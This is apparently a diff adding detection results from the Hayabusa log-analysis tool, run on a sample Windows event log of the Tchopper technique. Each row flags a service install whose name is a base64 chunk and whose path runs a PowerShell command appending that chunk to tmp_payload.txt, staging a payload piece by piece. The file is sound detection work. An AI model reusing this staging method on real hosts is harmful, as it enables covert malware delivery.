+2021-11-03 17:16:38.089 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LVByb2ZpbGVTdWdnZXN0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg58"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:39.555 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: aW9uIHsgcGFyYW0oJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgICNQcm9maWxlIHN1Z2VzdGlvbg0KICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyA9ICIiDQoNCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg59"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:39.555 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: aW9uIHsgcGFyYW0oJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgICNQcm9maWxlIHN1Z2VzdGlvbg0KICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyA9ICIiDQoNCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg59"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:39.555 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: aW9uIHsgcGFyYW0oJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgICNQcm9maWxlIHN1Z2VzdGlvbg0KICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyA9ICIiDQoNCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg59"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:41.021 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 0KICAgICAgICBJZiAoJEF2Z0V2ZW50c1BlclNlY29uZCAtR0UgMCAtYW5kICRBdmdFdmVudHNQZXJTZWNvbmQgLUxFIDEwMCkgew0KICAgICAgICAgDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg60"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:41.021 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0KICAgICAgICBJZiAoJEF2Z0V2ZW50c1BlclNlY29uZCAtR0UgMCAtYW5kICRBdmdFdmVudHNQZXJTZWNvbmQgLUxFIDEwMCkgew0KICAgICAgICAgDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg60"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:41.021 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0KICAgICAgICBJZiAoJEF2Z0V2ZW50c1BlclNlY29uZCAtR0UgMCAtYW5kICRBdmdFdmVudHNQZXJTZWNvbmQgLUxFIDEwMCkgew0KICAgICAgICAgDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg60"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:42.474 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: bmZvICs9ICJNU1JQQyAoMC0xMDApIEVQUyBvciBXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTYG4iICAgICAgICAgDQogICAgICAgICB9DQogICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg61"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:42.474 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bmZvICs9ICJNU1JQQyAoMC0xMDApIEVQUyBvciBXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTYG4iICAgICAgICAgDQogICAgICAgICB9DQogICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg61"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:42.474 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bmZvICs9ICJNU1JQQyAoMC0xMDApIEVQUyBvciBXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTYG4iICAgICAgICAgDQogICAgICAgICB9DQogICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg61"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:43.938 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgIyBBYm92ZSBIaWdoIEhhdGUNCiAgICAgICAgIElmICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HVCA2MjUpIHsgDQogICAgICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg62"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:43.938 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgIyBBYm92ZSBIaWdoIEhhdGUNCiAgICAgICAgIElmICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HVCA2MjUpIHsgDQogICAgICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg62"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:43.938 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgIyBBYm92ZSBIaWdoIEhhdGUNCiAgICAgICAgIElmICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HVCA2MjUpIHsgDQogICAgICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg62"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:45.441 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IlN1Z2dlc3RlZCBQcm9maWxlOiBIaWdoIEV2ZW50IFJhdGUgU2VydmVyICgyNTEtNjI1KSBFUFMiDQogICAgICAgICAgICAjJExvZ1N0YXRzQW5kSW5mbyArPSAiTk9URTogTG9nIEV2ZW50IFJhdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg63"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:45.441 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IlN1Z2dlc3RlZCBQcm9maWxlOiBIaWdoIEV2ZW50IFJhdGUgU2VydmVyICgyNTEtNjI1KSBFUFMiDQogICAgICAgICAgICAjJExvZ1N0YXRzQW5kSW5mbyArPSAiTk9URTogTG9nIEV2ZW50IFJhdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg63"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:45.441 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IlN1Z2dlc3RlZCBQcm9maWxlOiBIaWdoIEV2ZW50IFJhdGUgU2VydmVyICgyNTEtNjI1KSBFUFMiDQogICAgICAgICAgICAjJExvZ1N0YXRzQW5kSW5mbyArPSAiTk9URTogTG9nIEV2ZW50IFJhdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg63"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:46.913 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: UgSGlnaGVyIFRoZW4gUHJvZmlsZSBSYW5nZWBuIiANCiAgICAgICAgICAgICANCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gSGlnaCBFdmVudCBSYXRlIFNlcnZlciAxMjUwLTE4 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg64"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:46.913 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: UgSGlnaGVyIFRoZW4gUHJvZmlsZSBSYW5nZWBuIiANCiAgICAgICAgICAgICANCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gSGlnaCBFdmVudCBSYXRlIFNlcnZlciAxMjUwLTE4 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg64"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:46.913 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: UgSGlnaGVyIFRoZW4gUHJvZmlsZSBSYW5nZWBuIiANCiAgICAgICAgICAgICANCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gSGlnaCBFdmVudCBSYXRlIFNlcnZlciAxMjUwLTE4 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg64"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:48.360 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: NzUgKDQxNi02MjUpDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HRSAyNTApIHsgDQogICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0gIkhpZ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg65"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:48.360 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: NzUgKDQxNi02MjUpDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HRSAyNTApIHsgDQogICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0gIkhpZ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg65"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:48.360 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: NzUgKDQxNi02MjUpDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HRSAyNTApIHsgDQogICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0gIkhpZ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg65"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:49.806 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ggRXZlbnQgUmF0ZSBTZXJ2ZXIgKDI1MS02MjUpIEVQUyINCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gVHlwaWNhbCBTZXJ2ZXIgNTAwLTc1MCAoMTY2LTI1MCkNCiAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg66"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:49.806 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ggRXZlbnQgUmF0ZSBTZXJ2ZXIgKDI1MS02MjUpIEVQUyINCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gVHlwaWNhbCBTZXJ2ZXIgNTAwLTc1MCAoMTY2LTI1MCkNCiAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg66"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:49.806 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ggRXZlbnQgUmF0ZSBTZXJ2ZXIgKDI1MS02MjUpIEVQUyINCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gVHlwaWNhbCBTZXJ2ZXIgNTAwLTc1MCAoMTY2LTI1MCkNCiAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg66"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:51.269 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IEVsc2VJZiAgKCRBdmdFdmVudHNQZXJTZWNvbmQgLUdFIDUwKSB7IA0KICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyArPSAiVHlwaWNhbCBTZXJ2ZXIgKDUxLTI1MCkgRV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg67"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:51.269 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IEVsc2VJZiAgKCRBdmdFdmVudHNQZXJTZWNvbmQgLUdFIDUwKSB7IA0KICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyArPSAiVHlwaWNhbCBTZXJ2ZXIgKDUxLTI1MCkgRV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg67"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:51.269 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IEVsc2VJZiAgKCRBdmdFdmVudHNQZXJTZWNvbmQgLUdFIDUwKSB7IA0KICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyArPSAiVHlwaWNhbCBTZXJ2ZXIgKDUxLTI1MCkgRV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg67"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:52.716 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: BTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQogICAgICAgICAjLSBEZWZhdWx0IChFbmRwb2ludCkgMTAwLTE1MCAoMzMtNTApDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25k | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg68"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:52.716 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: BTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQogICAgICAgICAjLSBEZWZhdWx0IChFbmRwb2ludCkgMTAwLTE1MCAoMzMtNTApDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25k | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg68"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:52.716 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: BTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQogICAgICAgICAjLSBEZWZhdWx0IChFbmRwb2ludCkgMTAwLTE1MCAoMzMtNTApDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25k | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg68"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:54.170 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IC1HRSAwKSB7IA0KDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJbmZvICs9ICJXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg69"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:54.170 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IC1HRSAwKSB7IA0KDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJbmZvICs9ICJXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg69"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:54.170 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IC1HRSAwKSB7IA0KDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJbmZvICs9ICJXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg69"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:55.604 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ogICAgICAgICAjIE5lZ2l0aXZlIG9yIHVucmVhZGJsZSBhbmQgY2FudCBiZSBkZXRlcm1pbmVkIA0KICAgICAgICAgRWxzZSB7DQogICAgICAgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg70"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:55.604 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ogICAgICAgICAjIE5lZ2l0aXZlIG9yIHVucmVhZGJsZSBhbmQgY2FudCBiZSBkZXRlcm1pbmVkIA0KICAgICAgICAgRWxzZSB7DQogICAgICAgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg70"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:55.604 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ogICAgICAgICAjIE5lZ2l0aXZlIG9yIHVucmVhZGJsZSBhbmQgY2FudCBiZSBkZXRlcm1pbmVkIA0KICAgICAgICAgRWxzZSB7DQogICAgICAgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg70"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
